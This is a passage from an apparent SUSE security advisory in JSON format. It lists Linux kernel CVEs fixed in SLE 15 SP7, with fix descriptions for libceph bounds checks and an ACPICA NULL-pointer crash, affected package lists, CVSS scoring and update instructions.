"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
